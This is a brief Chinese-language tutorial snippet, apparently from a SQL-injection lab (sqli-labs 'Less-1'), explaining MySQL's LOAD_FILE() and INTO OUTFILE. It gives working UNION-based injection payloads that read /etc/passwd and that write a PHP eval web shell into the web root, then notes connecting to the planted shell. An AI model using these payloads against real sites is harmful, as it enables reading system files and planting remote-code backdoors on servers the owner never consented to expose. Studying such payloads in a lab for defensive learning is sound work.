1.文件读取函数load_file()
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回

LOAD_FILE(file_name);             LOAD_FILE(/etc/passwd);

其中file_name是文件的完整路径	

2.写入函数为into outfile()
INTO OUTFILE()函数将自定义字符串写入指定文件中 (前提权限允许写入)

SELECT … INTO OUTFILE ‘file_name’  SELECT …   INTO OUTFILE ‘/tmp/111’

load_file读取文件

Union select 1,load_file("/etc/passwd")--+

写入木马文件

Union select 1,"<?php @eval($_POST[x])?>",1 into outfile '/var/www/html/Less-1/1.php'--+

进行连接即可 但是需要网站文件夹有写的权限 如果没有就会提示